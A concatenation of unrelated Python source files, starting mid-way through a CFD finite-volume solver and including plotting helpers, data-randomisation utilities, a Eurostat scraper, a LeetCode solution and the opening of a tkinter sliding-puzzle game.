+ self.aWW[j, i] * self.FiWW(j, i) + self.aEE[j, i] * self.FiEE(j, i) + self.aNN[j, i] * self.FiNN(j, i) + self.aSS[j, i] * self.FiSS(j, i)
#self.C[j] = self.aW[j, i] * self.FiW(j, i) + self.aE[j, i] * self.FiE(j, i) + (self.pE(j,i) - self.pE(j,i)) + Su
self.C[j] = self.calculate_C(j, i, self.aW, self.FiW, self.aE, self.FiE, Su, self.p, self.var)
#end for j
#end calculateTDMACoefficients
def calculateQUICKSources(self):
'''
Determine sources on all cardinal points based on boundary conditions for QUICK scheme
'''
for j in range(0, self.Ny):
for i in range(0, self.Nx):
#self.calculate_alpha(j, i)
#west
if i == 0:
#cof = (8.0 / 3 * self.Df[self.W] + 2.0 / 8 * self.F[self.E, j, i] + self.F[self.W, j, i])
cof = (8.0 / 3 * self.D0W + 2.0 / 8 * self.F[self.E, j, i] + self.F[self.W, j, i])
self.SuW[j, i] = cof * self.Fi0W
self.SpW[j, i] = -cof
elif i == 1 :
cof = 1.0 / 4 * self.F[self.W, j, i]
self.SuW[j, i] = -cof * self.Fi0W
self.SpW[j, i] = cof
else:
self.SuW[j, i] = 0
self.SpW[j, i] = 0
#east
if i == self.Nx - 1:
cof = (8.0 / 3 * self.D0E - self.F[self.E, j, i])
self.SuE[j, i] = cof * self.Fi0E
self.SpE[j, i] = -cof
else:
self.SuE[j, i] = 0
self.SpE[j, i] = 0
#south
if j == 0:
cof = (8.0 / 3 * self.D0S + 2.0 / 8 * self.F[self.S, j, i] + self.F[self.S, j, i])
self.SuS[j, i] = cof * self.Fi0S
self.SpS[j, i] = -cof
elif j == 1:
cof = 1.0 / 4 * self.F[self.S, j, i]
self.SuS[j, i] = -cof * self.Fi0S
self.SpS[j, i] = cof
else:
self.SuS[j, i] = 0
self.SpS[j, i] = 0
#north
if j == self.Ny - 1:
cof = (8.0 / 3 * self.D0N - self.F[self.N, j, i])
self.SuN[j, i] = cof * self.Fi0N
self.SpN[j, i] = -cof
else:
self.SuN[j, i] = 0
self.SpN[j, i] = 0
#end j
if self.debug == True:
if self.Nx == 1:
print "Su:", self.SuS + self.SuN
print "Sp:", self.SpS + self.SpN
else:
print "Su:", self.SuE + self.SuW + self.SuS + self.SuN
print "Sp:", self.SpE + self.SpW + self.SpS + self.SpN
#end calculateStandardSources
def calculateCDSources(self):
'''
Determine sources on all cardinal points based on boundary conditions for central differences scheme
'''
for j in range(0, self.Ny):
for i in range(0, self.Nx):
#west
if i == 0:
self.SuW[j, i] = (self.D0W + self.F[self.W, j, i]) * self.Fi0W
self.SpW[j, i] = -(self.D0W + self.F[self.W, j, i])
else:
self.SuW[j, i] = 0
self.SpW[j, i] = 0
#east
if i == self.Nx - 1:
self.SuE[j, i] = (self.D0E - self.F[self.E, j, i]) * self.Fi0E
self.SpE[j, i] = -(self.D0E - self.F[self.E, j, i])
else:
self.SuE[j, i] = 0
self.SpE[j, i] = 0
#north
if j == self.Ny - 1:
self.SuN[j, i] = (self.D0N - self.F[self.N, j, i]) * self.Fi0N
self.SpN[j, i] = -(self.D0N - self.F[self.N, j, i])
else:
self.SuN[j, i] = 0
self.SpN[j, i] = 0
#south
if j == 0:
self.SuS[j, i] = (self.D0S + self.F[self.S, j, i]) * self.Fi0S
self.SpS[j, i] = -(self.D0E + self.F[self.S, j, i])
else:
self.SuS[j, i] = 0
self.SpS[j, i] = 0
#end j
if self.debug == True:
print "Su:", self.SuE + self.SuW + self.SuS + self.SuN
print "Sp:", self.SpE + self.SpW + self.SpS + self.SpN
#end calculateCDSources
def calculateUDSources(self):
'''
Determine sources on all cardinal points based on boundary conditions for upwind differences scheme
'''
for j in range(0, self.Ny):
for i in range(0, self.Nx):
#west
if i == 0:
#self.SuW[j, i] = (2 * self.Df[self.W] + self.F[self.W, j, i]) * self.Fi0W
#self.SpW[j, i] = -(2 * self.Df[self.W] + self.F[self.W, j, i])
cof = (self.D0W + self.F[self.W, j, i])
self.SuW[j, i] = cof * self.Fi0W
self.SpW[j, i] = -cof
else:
self.SuW[j, i] = 0
self.SpW[j, i] = 0
#east
if i == self.Nx - 1:
cof = self.D0E
self.SuE[j, i] = cof * self.Fi0E
self.SpE[j, i] = -cof
#self.SuE[j, i] = 2 * self.Df[self.E] * self.Fi0E
#self.SpE[j, i] = -2 * self.Df[self.E]
else:
self.SuE[j, i] = 0
self.SpE[j, i] = 0
#north
if j == self.Ny - 1:
#self.SuN[j, i] = 2 * self.Df[self.N] * self.Fi0N
#self.SpN[j, i] = -2 * self.Df[self.N]
cof = self.D0N
self.SuN[j, i] = cof * self.Fi0N
self.SpN[j, i] = -cof
else:
self.SuN[j, i] = 0
self.SpN[j, i] = 0
#south
if j == 0:
#self.SuS[j, i] = (2 * self.Df[self.S] + self.F[self.S, j, i]) * self.Fi0S
#self.SpS[j, i] = -(2 * self.Df[self.S] + self.F[self.S, j, i])
cof = self.D0S + self.F[self.S, j, i]
self.SuS[j, i] = cof * self.Fi0S
self.SpS[j, i] = -cof
else:
self.SuS[j, i] = 0
self.SpS[j, i] = 0
#end j
if self.debug == True:
print "Su:", self.SuE + self.SuW + self.SuS + self.SuN
print "Sp:", self.SpE + self.SpW + self.SpS + self.SpN
#end calculateuDSources
def calculate_aP(self, scheme, Sp, fE, fW, fN, fS, aE, aW, aN, aS, aEE = 0, aWW = 0, aNN = 0, aSS = 0):
if scheme == 'QUICK':
return aW + aE + aS + aN + (fE - fW) + (fN - fS) - Sp + aSS + aNN + aWW + aEE
elif scheme == 'UD':
return aW + aE + aS + aN + (fE - fW) + (fN - fS) - Sp
elif scheme == 'CD':
return aW + aE + aS + aN + (fE - fW) + (fN - fS) - Sp
#end calculate_aP
def calculateQUICKCoefficients(self):
'''
2D "a" coeficients for QUICK are implementation at page 163 in the Versteeg book
'''
self.calculateQUICKSources()
for j in range(0, self.Ny):
for i in range(0, self.Nx) :
self.calculate_alpha(j, i)
#aW
if i == 0:
self.aW[j, i] = 0
elif i == 1:
self.aW[j, i] = self.Df[self.W] + 7.0 / 8 * self.F[self.W, j, i] + 1.0 / 8 * self.F[self.E, j, i]
elif i == self.Nx - 1:
self.aW[j, i] = self.Df[self.W] + 1.0 / 3 * self.D0E + 6.0 / 8 * self.F[self.W, j, i]
else:
self.aW[j, i] = self.Df[self.W] + 6.0 / 8 * self.Alpha_w * self.F[self.W, j, i] + 1.0 / 8 * self.Alpha_e * self.F[self.E, j, i]\
+ 3.0 / 8 * (1 - self.Alpha_w) * self.F[self.W, j, i]
#aE
if i == 0 :
self.aE[j, i] = self.Df[self.E] + 1.0 / 3 * self.D0W - 3.0 / 8 * self.F[self.E, j, i]
elif i == 1:
self.aE[j, i] = self.Df[self.E] - 3.0 / 8 * self.Alpha_e * self.F[self.E, j, i]
elif i == self.Nx - 1:
self.aE[j, i] = 0
else:
self.aE[j, i] = self.Df[self.E] - 3.0 / 8 * self.Alpha_e * self.F[self.E, j, i] - 6.0 / 8 * (1 - self.Alpha_e) * self.F[self.E, j, i]\
- 1.0 / 8 * (1 - self.Alpha_w) * self.F[self.W, j, i]
#aWW
if i == 0:
self.aWW[j, i] = 0
elif i == 1:
self.aWW[j, i] = 0
else:
self.aWW[j, i] = -1.0 / 8 * self.Alpha_w * self.F[self.W, j, i]
#aEE
if i == self.Nx - 1 or i == self.Nx - 2:
self.aEE[j, i] = 0
else:
self.aEE[j, i] = 1.0 / 8 * (1 - self.Alpha_e) * self.F[self.E, j, i]
#aS
if j == 0:
self.aS[j, i] = 0
elif j == 1:
self.aS[j, i] = self.Df[self.S] + 7.0 / 8 * self.F[self.S, j, i] + 1.0 / 8 * self.F[self.N, j, i]
elif j == self.Ny - 1:
self.aS[j, i] = self.Df[self.S] + 1.0 / 3 * self.D0N + 6.0 / 8 * self.F[self.S, j, i]
else:
self.aS[j, i] = self.Df[self.S] + 6.0 / 8 * self.Alpha_s * self.F[self.S, j, i] + 1.0 / 8 * self.Alpha_n * self.F[self.N, j, i] + 3.0 / 8 * (1 - self.Alpha_s) * self.F[self.S, j, i]
#aNself.eps
if j == 0 :
self.aN[j, i] = self.Df[self.N] + 1.0 / 3 * self.D0S - 3.0 / 8 * self.F[self.N, j, i]
elif j == 1:
self.aN[j, i] = self.Df[self.N] - 3.0 / 8 * self.Alpha_n * self.F[self.N, j, i]
elif j == self.Ny - 1:
self.aN[j, i] = 0
else:
self.aN[j, i] = self.Df[self.N] - 3.0 / 8 * self.Alpha_n * self.F[self.N, j, i] - 6.0 / 8 * (1 - self.Alpha_n) * self.F[self.N, j, i] - 1.0 / 8 * (1 - self.Alpha_s) * self.F[self.S, j, i]
#aSS
if j == 0:
self.aSS[j, i] = 0
elif j == 1:
self.aSS[j, i] = 0
else:
self.aSS[j, i] = -1.0 / 8 * self.Alpha_s * self.F[self.S, j, i]
#aNN
if j == self.Ny - 1 or j == self.Ny - 2:
self.aNN[j, i] = 0
else:
self.aNN[j, i] = 1.0 / 8 * (1 - self.Alpha_n) * self.F[self.N, j, i]
Sp = self.SpE[j, i] + self.SpW[j, i] + self.SpS[j, i] + self.SpN[j, i]
#self.aP[j, i] = self.aW[j, i] + self.aE[j, i] + self.aS[j, i] + self.aN[j, i] + self.aSS[j, i] + self.aNN[j, i] + self.aWW[j, i] + self.aEE[j, i]\
# + (self.F[self.E] - self.F[self.W]) + (self.F[self.N] - self.F[self.S]) - Sp
self.aP[j, i] = self.calculate_aP('QUICK', Sp, \
self.F[self.E, j, i], self.F[self.W, j, i], self.F[self.N, j, i], self.F[self.S, j, i], \
self.aE[j, i], self.aW[j, i], self.aN[j, i], self.aS[j, i], \
self.aEE[j, i], self.aWW[j, i], self.aNN[j, i], self.aSS[j, i])
#TVD deferred correction source term
#end i
#end j
#end calculateStandardOUICKcoefficients
def calculateUDCoefficients(self):
'''
calculare matrix coefficients for Upwind scheme
'''
self.calculateUDSources()
for j in range(0, self.Ny):
for i in range(0, self.Nx) :
#west
if i == 0:
self.aW[j, i] = 0
else:
self.aW[j, i] = self.Df[self.W] + max(self.F[self.W, j, i], 0)
#east
if i == self.Nx - 1:
self.aE[j, i] = 0
else:
self.aE[j, i] = self.Df[self.E] + max(0, -self.F[self.E, j, i])
#north
if j == self.Ny - 1:
self.aN[j, i] = 0
else:
self.aN[j, i] = self.Df[self.N] + max(0, -self.F[self.N, j, i])
#south
if j == 0:
self.aS[j, i] = 0
else:
self.aS[j, i] = self.Df[self.S] + +max(self.F[self.S, j, i], 0)
#ap coefficient
Sp = self.SpW[j, i] + self.SpE[j, i] + self.SpS[j, i] + self.SpN[j, i]
#self.aP[j, i] = self.aW[j, i] + self.aE[j, i] + self.aS[j, i] + self.aN[j, i] + (self.F[self.E] - self.F[self.W]) + (self.F[self.N] - self.F[self.S]) - Sp
self.aP[j, i] = self.calculate_aP('UD', Sp, \
self.F[self.E, j, i], self.F[self.W, j, i], self.F[self.N, j, i], self.F[self.S, j, i], \
self.aE[j, i], self.aW[j, i], self.aN[j, i], self.aS[j, i])
#END for i
#end calculateUDCoefficients
def calculateCDCoefficients(self):
'''
calculate matrix coeff for upwinding scheme
'''
self.calculateCDSources()
for j in range(0, self.Ny):
for i in range(0, self.Nx) :
#west
if i == 0:
self.aW[j, i] = 0
else:
self.aW[j, i] = self.Df[self.W] + self.F[self.W, j, i] / 2
#east
if i == self.Nx - 1:
self.aE[j, i] = 0
else:
self.aE[j, i] = self.Df[self.E] - self.F[self.E, j, i] / 2
#north
if j == self.Ny - 1:
self.aN[j, i] = 0
else:
self.aN[j, i] = self.Df[self.N] - self.F[self.N, j, i] / 2
#south
if j == 0:
self.aS[j, i] = 0
else:
self.aS[j, i] = self.Df[self.S] + self.F[self.S, j, i] / 2
#ap coefficient
Sp = self.SpW[j, i] + self.SpE[j, i] + self.SpS[j, i] + self.SpN[j, i]
#self.aP[j, i] = self.aW[j, i] + self.aE[j, i] + self.aS[j, i] + self.aN[j, i] + (self.F[self.E] - self.F[self.W]) + (self.F[self.N] - self.F[self.S]) - Sp
self.aP[j, i] = self.calculate_aP('CD', Sp, \
self.F[self.E, j, i], self.F[self.W, j, i], self.F[self.N, j, i], self.F[self.S, j, i], \
self.aE[j, i], self.aW[j, i], self.aN[j, i], self.aS[j, i])
#END for i
#end calculateCDCoefficients
def callSolver(self):
#solve with TDMA for this i vertical line S-N
n = self.D.size
Iter = 0
#does not depend on Fi so we take it our of the iteration process
if self.scheme == "QUICK":
self.calculateQUICKCoefficients()
elif self.scheme == "CD":
self.calculateCDCoefficients()
elif self.scheme == "UD":
self.calculateUDCoefficients()
else:
print "Unknown Scheme!!!"
return
#Because we don't know the values of Fi in the middle the first calculation will be far off
#Therefore we set an iterative cycle to calculate the values of Fi
if self.simple.lc.CPP == True:
x = numpy.zeros(n)
while self.maxiter > Iter :
#Swipe from W to E
for i in range(0, self.Nx):
#calculate the TDMA coefficients for column i
self.calculateTDMACoefficients(i)
if self.debug == True:
print "beta:", self.bet
print "D", self.D
print "alp", self.alp
print "C", self.C
if self.simple.lc.CPP == True:
self.cls.setTDMA(-self.bet[1:], self.D, -self.alp[:-1], self.C, n)
d = self.cls.solveTDMA(x, n)
self.Fi[:, i] = d["solution"].copy()
else :
x = thomas(n, -self.bet[1:], self.D, -self.alp[:-1], self.C)
self.Fi[:, i] = x.copy()
#end i
#TODO Under relaxation
self.Fi = self.urf * self.Fi.copy() + self.FiOld.copy() * (1 - self.urf)
#test accuracy and exit condition
if self.Nx == 1:
flat = self.Fi[:, 0] - self.FiOld[:, 0]
else:
flat = self.Fi[:, 1] - self.FiOld[:, 1]
dx = math.sqrt(numpy.dot(flat, flat))
if Iter % 600 == 0:
print "var: %s iter # %d, dx=%1.9f" % (self.var, Iter, dx)
#print "Fi:", self.Fi
#Exit if we are satisfied wit the accuracy
if dx < self.EPSILON :
return
Iter += 1
#copy current values to the old values matrix
self.FiOld = self.Fi.copy()
#if we did not converge yet print an error and exit
if self.maxiter < Iter:
print "Max iterations exceeded => did not converge"
return
#end while
#end callQUICK
def plotFi(self):
fig = plt.figure(1, facecolor = 'w', edgecolor = 'k') #prepare the plotting environment
ax = fig.add_subplot(111)
if self.Nx == 1:
y = numpy.arange(0., self.Ly, self.deltaY)
ax.plot(y, self.Fi[:, 0])
else:
#create the figure and axes object
# Creating the grid of coordinates x,y
x = numpy.arange(0., self.Lx, self.deltaX) #create the x, and y divisions
y = numpy.arange(0., self.Ly, self.deltaY)
X, Y = numpy.meshgrid(x, y) #create the grid
#plot a heatmap
im = ax.pcolor(X, Y, self.Fi) # draw the heatmap
fig.colorbar(im) # add the legend on a colour bar
#superimpose contours
cs = ax.contour(X, Y, self.Fi) # draw the contour
plt.clabel(cs, inline = 1, fontsize = 10) # draw the contour
#draw only the contours
fig2 = plt.figure(2, facecolor = 'w', edgecolor = 'k')
ax2 = fig2.add_subplot(111)
cs = ax2.contour(X, Y, self.Fi) # draw the contour
plt.clabel(cs, inline = 1, fontsize = 10) # create the label on the contour
#end if
plt.show()
#end plotFi
def solve(self):
#We know E,W, N, S boundary conditions, so lets speed up things
self.setBoundaryConditions()
#call the main algorithm
self.callSolver()
#print the solution vector
print self.Fi
return self.Fi
#end solve
#end class
|
import csv
import numpy
import matplotlib.pyplot as plt
def plot_all_bars(ranks, acceptance_rates, exported_figure_filename):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
#prices = list(map(int, ranks))
X = numpy.arange(len(ranks))
width = 0.25
ax.bar(X+width, acceptance_rates, width)
ax.set_xlim([0, 250])
fig.savefig(exported_figure_filename)
fieldNames = ['name', 'rank', 'acceptance']
dataTypes = [('name', 'a200'), ('rank','i'), ('acceptance', 'i')]
# Load data from csv into numpy
college_data = numpy.genfromtxt('college_data.csv', delimiter=',', skip_header=1,
names=fieldNames, invalid_raise=False,
dtype=dataTypes)
plot_all_bars(college_data['rank'], college_data['acceptance'], 'chart_college_data.png')
|
#!/usr/bin/env python
import math
from random import choice, randint, sample, random
def random_judgement(old_judgement):
return randint(1, 7)
def random_judgement_offset(old_judgement, d=3):
if random() <= 0.5:
d = -d
return (old_judgement + d - 1) % 7 + 1
def randomize_values(data, p, rfunc=random_judgement):
assert 0 <= p <= 1
data = data.copy()
judgement_columns = data.columns[2:]
isstr = lambda x: isinstance(x, str)
replf = lambda x: (isstr(x) or random() > p) and x or rfunc(x)
return data.applymap(replf)
def randomize_offsets(data, p):
return randomize_values(data, p, random_judgement_offset)
def blank_values(data, p):
assert 0 <= p <= 1
judgement_columns = data.columns[2:]
isstr = lambda x: isinstance(x, str)
r = lambda x: (isstr(x) or random() > p) and x or float('nan')
retval = data.applymap(r)
return retval
def add_subjects(data, n, rfunc=random_judgement):
data = data.copy()
for i in xrange(n):
data['fakecol_%d' % i] = data.index.map(lambda x: rfunc(x))
return data
def replace_subjects(data, n, rfunc=random_judgement):
judgement_columns = data.columns[2:]
assert n <= len(judgement_columns)
removed_columns = sample(judgement_columns, n)
data = data.copy()
for rc in removed_columns:
data[rc] = data[rc].map(lambda x: rfunc(x))
return data
def replace_percent_subjects(data, p, rfunc=random_judgement):
judgement_columns = data.columns[2]
n = int(math.ceil(p * len(judgement_columns)))
return replace_subjects(data, n, rfunc)
def blank_subjects(data, n):
judgement_columns = data.columns[2:]
removed_columns = sample(judgement_columns, n)
data = data.copy()
for rc in removed_columns:
data[rc] = float('nan')
return data
|
import argparse
import os
import json
from utils import send_json_post
_APP_URL = f"http://127.0.0.1:5000/led"
""" Example usage
python send_saved_json_to_app.py --filenam=red_check
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--filename", required=True, type=str)
args = parser.parse_args()
filepath = os.path.join("data/", args.filename + ".json")
assert os.path.isfile(filepath), f"filepath '{filepath}' does not exist"
with open(filepath, "r") as f:
data = json.load(f)
send_json_post(_APP_URL, data, verbose=True)
|
class ExportModelBase:
'''
Clase base para las exportaciones.
'''
@classmethod
def classifyUserData(cls, usersData):
classifiedUsersData = {}
for user in usersData:
classifiedUsersData[user.id] = user
return classifiedUsersData
@classmethod
def exportLogs(cls, ownerId, logs, usersData):
raise Exception('not implemented')
@classmethod
def exportStatistics(cls, ownerId, stats, usersData):
raise Exception('not implemented')
|
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns # for beautiful plots
from scipy import stats
import math
# plotly系-----------
import plotly.offline as py
py.init_notebook_mode(connected=True)
from plotly.offline import init_notebook_mode, iplot
init_notebook_mode(connected=True)
import plotly.graph_objs as go
import plotly.offline as offline
offline.init_notebook_mode()
#--------------------------------
def predict_cv(model, train_x, train_y, test_x):
preds = []
preds_test = []
va_indexes = []
kf = KFold(n_splits=4, shuffle=True, random_state=6785)
# クロスバリデーションで学習・予測を行い、予測値とインデックスを保存する
for i, (tr_idx, va_idx) in enumerate(kf.split(train_x)):
tr_x, va_x = train_x.iloc[tr_idx], train_x.iloc[va_idx]
tr_y, va_y = train_y.iloc[tr_idx], train_y.iloc[va_idx]
model.fit(tr_x, tr_y)
tr_pred = model.predict(tr_x)
pred = model.predict(va_x)
preds.append(pred)
pred_test = model.predict(test_x)
preds_test.append(pred_test)
va_indexes.append(va_idx)
print(' score Train : {:.6f}' .format(np.sqrt(mean_squared_error(tr_y, tr_pred))),
' score Valid : {:.6f}' .format(np.sqrt(mean_squared_error(va_y, pred))))
# バリデーションデータに対する予測値を連結し、その後元の順番に並べなおす
va_indexes = np.concatenate(va_indexes)
preds = np.concatenate(preds, axis=0)
order = np.argsort(va_indexes)
pred_train = pd.DataFrame(preds[order])
# テストデータに対する予測値の平均をとる
preds_test = pd.DataFrame(np.mean(preds_test, axis=0))
print('Score : {:.6f}' .format(np.sqrt(mean_squared_error(train_y, pred_train))))
return pred_train, preds_test, model
def missing_check(data,head_count=5):
total = data.isnull().sum().sort_values(ascending=False)
percent = (data.isnull().sum()/data.isnull().count()).sort_values(ascending=False)
missing_data = pd.concat([total, percent],axis=1, keys=['Total','Percent'])
print('Number of missing columns:', len(missing_data[missing_data['Percent']>0]))
return missing_data
def object_countplot(data, add_cols,col_num=3,label_vertical=True):
# データセットの中でobject型の変数をラベルごとに棒グラフにする
# col_numは表示するグラフの列の数
# label_verticalはラベルを縦に表示するか横に表示するか決める
data_object_columns = data.select_dtypes('object').columns
obj_cols = list(data_object_columns)
obj_cols = obj_cols + add_cols
nr_rows = math.ceil(len(obj_cols)/col_num)
nr_cols = col_num
subplot_ratio = [4,3]
if label_vertical:
subplot_ratio = [4,5]
fig, axs = plt.subplots(nr_rows, nr_cols, figsize=(nr_cols*subplot_ratio[0],nr_rows*subplot_ratio[1]))
for r in range(0,nr_rows):
for c in range(0,nr_cols):
i = r*nr_cols+c
if i < len(obj_cols):
g = sns.countplot(x=obj_cols[i], data=data, ax = axs[r][c])
if label_vertical:
a = data[obj_cols[i]].value_counts().index
g.set_xticklabels(a, rotation=90)
plt.tight_layout()
plt.show()
def object_label(var_name,tar_name, data):
#変数の中のカテゴリーごとにTargetの0,1の割合を集計
#tar_nameは0,1ラベルの変数
#この変数は1の割合を示している
zentai = data[var_name].value_counts()
target_1 = data[data[tar_name]==1][var_name].value_counts()
per = target_1/zentai
per = per.sort_values(ascending=False)
#プロットを行う
labels = list(per.index)
x = np.arange(len(labels))
width = 0.35
fig, ax = plt.subplots()
rect = ax.bar(x, per, width)
ax.set_xticks(x)
ax.set_xticklabels(labels,rotation=-90)
plt.show()
#データフレームにして返す
df = pd.concat([per,zentai,target_1],axis=1)
df.columns = ['tar_per','count','tar1_count']
return df
def iplt_countplot(var_name,tar_name,data):
#iplotでカテゴリ変数のカテゴリごとにtargetの数を集計
temp = data[var_name].value_counts()
#print(temp.values)
temp_y0 = []
temp_y1 = []
for val in temp.index:
temp_y1.append(np.sum(data[tar_name][data[var_name]==val] == 1))
temp_y0.append(np.sum(data[tar_name][data[var_name]==val] == 0))
trace1 = go.Bar(
x = temp.index,
y = (temp_y1 / temp.sum()) * 100,
name='YES'
)
trace2 = go.Bar(
x = temp.index,
y = (temp_y0 / temp.sum()) * 100,
name='NO'
)
fig_data = [trace1, trace2]
layout = go.Layout(
title = var_name + ' for '+ tar_name,
#barmode='stack',
width = 1000,
xaxis=dict(
title=var_name,
tickfont=dict(
size=10,
color='rgb(107, 107, 107)'
)
),
yaxis=dict(
title='Count in %',
titlefont=dict(
size=16,
color='rgb(107, 107, 107)'
),
tickfont=dict(
size=14,
color='rgb(107, 107, 107)'
)
)
)
#プロットを行う
fig = go.Figure(data=fig_data, layout=layout)
iplot(fig)
def one_hot_encoder(df, nan_as_category = True):
original_columns = list(df.columns)
categorical_columns = [col for col in df.columns if df[col].dtype == 'object']
df = pd.get_dummies(df, columns= categorical_columns, dummy_na= nan_as_category)
new_columns = [c for c in df.columns if c not in original_columns]
return df, new_columns
def kde_target(var_name,tar_name, df):
# ターゲットが2値変数の時だけ使える
# Calculate the correlation coefficient between the new variable and the target
corr = df[tar_name].corr(df[var_name])
# Calculate medians for repaid vs not repaid
avg_repaid = df.loc[df[tar_name] == 0, var_name].median()
avg_not_repaid = df.loc[df[tar_name] == 1, var_name].median()
plt.figure(figsize = (9, 6))
# Plot the distribution for target == 0 and target == 1
sns.kdeplot(df.loc[df[tar_name] == 0, var_name], label = 'TARGET == 0')
sns.kdeplot(df.loc[df[tar_name] == 1, var_name], label = 'TARGET == 1')
# label the plot
plt.xlabel(var_name); plt.ylabel('Density'); plt.title('%s Distribution' % var_name)
plt.legend();
# print out the correlation
print('The correlation between %s and the TARGET is %0.4f' % (var_name, corr))
# Print out average values
print('Median value for loan that was not repaid = %0.4f' % avg_not_repaid)
print('Median value for loan that was repaid = %0.4f' % avg_repaid)
|
class Solution(object):
def sumsquare(self, n):
sum = 0
while(n > 0):
p = n % 10
sum += p ** 2
n //= 10
return sum
def isHappy(self, n):
"""
https://leetcode.com/problems/happy-number/
could use simple hashmap.
but floyd cycle detection to the rescue.
mathematically there will always be a cycle in a pattern like this
just detect the cycle and check if the cycle is in 1 or not and voila!
of course had to see the solution. :( talk about garbage skills.
"""
slow = self.sumsquare(n)
fast = self.sumsquare(slow)
while (True):
if slow == fast:
break
slow = self.sumsquare(slow)
fast = self.sumsquare(self.sumsquare(fast))
return fast == 1
|
import sys
# Dmitry Brant, Apr 2021
arg_id = 1
while arg_id < len(sys.argv):
if "prod-" not in sys.argv[arg_id]:
continue
in_file = open(sys.argv[arg_id], encoding="utf-8")
wiki_name = sys.argv[arg_id].split("-")[1]
out_file = open(wiki_name + "_image_candidates.tsv", mode="w", encoding="utf-8")
arg_id = arg_id + 1
# remove headers
line = in_file.readline()
prev_pageid = -1
source_str = ""
prev_image = ""
line_out = ""
while True:
line = in_file.readline()
if not line:
break
line_arr = line.replace("\n", "").replace("\r", "").split("\t")
if prev_pageid != int(line_arr[0]):
# write out the previous line
if len(line_out) > 0:
out_file.write(line_out + source_str + "\n")
line_out = ""
source_str = ""
prev_pageid = int(line_arr[0])
prev_image = line_arr[2]
source = line_arr[4]
if len(line_out) == 0:
line_out = line_arr[0] + "\t" + line_arr[2] + "\t"
# add on new sources?
if prev_image.replace("_", " ") == line_arr[2].replace("_", " "):
if len(source_str) > 0:
source_str += ","
if source == "wikidata":
source_str += "wd"
elif source == "commons":
source_str += "com"
elif source == "wikipedia":
source_str += line_arr[8].replace("wiki", "").replace("_min_nan", "")
else:
print(">>>>> " + source)
# write out the last line
if len(line_out) > 0:
out_file.write(line_out + source_str + "\n")
in_file.close()
|
# -*- coding: utf-8 -*-
import datetime
import requests
import lxml.html
from eust.core import conf
_PAGE_DATE_FORMAT = r"%d/%m/%Y %H:%M:%S"
_VERSION_DATE_FORMAT = r"%Y-%m-%d %H%M%S"
def _get_table_name(row):
link_text = row.xpath("td")[0].xpath("a")[0].text
assert link_text.endswith(".tsv.gz"), link_text
return link_text.replace(".tsv.gz", "")
def _get_dl_url(row):
return row.xpath("td")[0].xpath("a")[0].attrib["href"]
def _get_table_date(row):
s = row.xpath("td")[3].text
assert s.startswith(" \xa0")
return datetime.datetime.strptime(s[2:], _PAGE_DATE_FORMAT)
def _scrape_bulk_infos(initial_letter):
url_template = conf["bulk_tsv_page_url_template"]
url = url_template.format(letter=initial_letter)
page = requests.get(url)
tree = lxml.html.fromstring(page.content)
rows = tree.xpath("/html/body/div/form/table/tr")
if not rows:
raise ValueError("found no rows when scraping bulk download page")
h0 = rows[0]
assert h0.xpath("th")[0].xpath("a")[0].text == "Name", h0
h1 = rows[1]
assert h1.xpath("td")[0].xpath("a")[0].text.endswith("up one level"), h1
table_rows = rows[2:]
return {
_get_table_name(r): {
"version": _get_table_date(r).strftime(_VERSION_DATE_FORMAT),
"url": _get_dl_url(r),
}
for r in table_rows
}
def _scrape_bulk_info(table):
table_start_letter = table[0]
table_infos = _scrape_bulk_infos(table_start_letter)
if table not in table_infos:
raise ValueError(f"could not find bulk download info for {table}")
table_info = table_infos[table]
return table_info
|
from tkinter import *
from tkinter.ttk import Entry,Button,OptionMenu
from PIL import Image,ImageTk
import random
from tkinter import filedialog as tkFileDialog
import os
import time
class Tiles():
def __init__(self,grid):
self.tiles=[]
self.grid=grid
self.gap=None
self.moves=0
def add(self,tile):
self.tiles.append(tile)
def getTile(self,*pos):
for tile in self.tiles:
if tile.pos == pos:
return tile
def getTileAroundGap(self):
gRow,gCol=self.gap.pos
return self.getTile(gRow,gCol-1),self.getTile(gRow-1,gCol),self.getTile(gRow,gCol+1),self.getTile(gRow+1,gCol)
def changeGap(self,tile):
try:
gPos=self.gap.pos
self.gap.pos=tile.pos
tile.pos=gPos
self.moves+=1
except:
pass
def slide(self,key):
left,top,right,down=self.getTileAroundGap()
if key == 'Up':
self.changeGap(down)
if key == 'Down':
self.changeGap(top)
if key == 'Left':
self.changeGap(right)
if key == 'Right':
self.changeGap(left)
self.show()
def shuffle(self):
random.shuffle(self.tiles)
i=0
for row in range(self.grid):
for col in range(self.grid):
self.tiles[i].pos=(row,col)
i+=1
def show(self):
for tile in self.tiles:
if self.gap != tile:
tile.show()
def setGap(self,index):
self.gap = self.tiles[index]
def isCorrect(self):
for tile in self.tiles:
if not tile.isCorrectPos():
return False
return True
class Tile(Label):
def __init__(self,parent,image,pos):
Label.__init__(self,parent,image=image)
self.image=image
self.pos=pos
self.curPos=pos
def show(self):
self.grid(row=self.pos[0],column=self.pos[1])
def isCorrectPos(self):
return self.pos == self.curPos
class Board(Frame):
MAX_BOARD_SIZE=500
def __init__(self,parent,image,grid,win,shuffle,menu,*args,**kwargs):
Frame.__init__(self,parent,*args,**kwargs)
self.parent=parent
self.grid=grid
self.win = win
self.mainMenu = menu
self.image=self.openImage(image)
self.tileSize=self.image.size[0]/self.grid
self.shuffle = shuffle
self.tiles=self.createTiles()
if shuffle==True:
self.tiles.shuffle()
self.tiles.show()
self.bindKeys()
def bindKeys(self):
self.bind_all('<Key-Up>',self.slide)
self.bind_all('<Key-Right>',self.slide)
self.bind_all('<Key-Down>',self.slide)
self.bind_all('<Key-Left>',self.slide)
self.bind_all('<g>',self.mainMenu)
def openImage(self,image):
image=Image.open(image)
imageSize=min(image.size)
if min(image.size) > self.MAX_BOARD_SIZE:
image=image.resize((self.MAX_BOARD_SIZE,self.MAX_BOARD_SIZE),Image.ANTIALIAS)
if image.size[0] != image.size[1]:
image=image.crop((0,0,image.size[0],image.size[0]))
return image
def slide(self,event):
self.tiles.slide(event.keysym)
if self.tiles.isCorrect()==True:
self.win(self.tiles.moves)
def createTiles(self):
tiles=Tiles(self.grid)
for row in range(self.grid):
for col in range(self.grid):
x0=col*self.tileSize
y0=row*self.tileSize
x1=x0+self.tileSize
y1=y0+self.tileSize
